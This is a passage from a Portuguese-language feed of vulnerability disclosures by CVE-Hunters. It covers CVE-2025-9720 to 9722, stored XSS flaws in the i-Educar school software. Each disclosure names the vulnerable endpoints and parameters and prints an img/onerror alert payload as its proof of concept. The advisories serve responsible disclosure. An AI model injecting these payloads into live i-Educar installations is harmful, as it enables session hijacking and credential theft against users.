&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9720/image.png&amp;#34;
	width=&amp;#34;646&amp;#34;
	height=&amp;#34;278&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9720/image_hu_9177624e6cc80aee.png 480w, /p/cve-2025-9720/image_hu_228acf1500b7defe.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;232&amp;#34;
		data-flex-basis=&amp;#34;557px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9720.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9720.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9721</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9721/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9721/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9721-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-formulamediaedit&amp;#34;&amp;gt;CVE-2025-9721: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;FormulaMedia/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9721&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9721&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;FormulaMedia/edit&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;formulaMedia&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9721-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-formulamediaedit&amp;#34;&amp;gt;CVE-2025-9721: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;FormulaMedia/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9721&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9721&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;FormulaMedia/edit&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;formulaMedia&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;formulaMedia&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;formulaMedia&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9721/image.png&amp;#34;
	width=&amp;#34;575&amp;#34;
	height=&amp;#34;237&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9721/image_hu_a20ceff440c81918.png 480w, /p/cve-2025-9721/image_hu_dbd5009a60ec4280.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;242&amp;#34;
		data-flex-basis=&amp;#34;582px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9721/image-1.png&amp;#34;
	width=&amp;#34;567&amp;#34;
	height=&amp;#34;221&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9721/image-1_hu_36237c6d629f87b.png 480w, /p/cve-2025-9721/image-1_hu_10da103514a2b8fa.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;256&amp;#34;
		data-flex-basis=&amp;#34;615px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9721.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9721.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9722</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9722/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9722/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9722-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_ocorrencia_disciplinar_cadphp&amp;#34;&amp;gt;CVE-2025-9722: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9722&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9722&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9722-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_ocorrencia_disciplinar_cadphp&amp;#34;&amp;gt;CVE-2025-9722: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9722&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9722&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9722/image.png&amp;#34;
	width=&amp;#34;584&amp;#34;
	height=&amp;#34;257&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9722/image_hu_c8cf46eb6b050b41.png 480w, /p/cve-2025-9722/image_hu_f1b1f0088f0fff87.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;227&amp;#34;
		data-flex-basis=&amp;#34;545px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9722/image-1.png&amp;#34;
	width=&amp;#34;551&amp;#34;
	height=&amp;#34;217&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9722/image-1_hu_8154a177a690938.png 480w, /p/cve-2025-9722/image-1_hu_7bd166c5469b1b4a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;253&amp;#34;
		data-flex-basis=&amp;#34;609px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9722.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
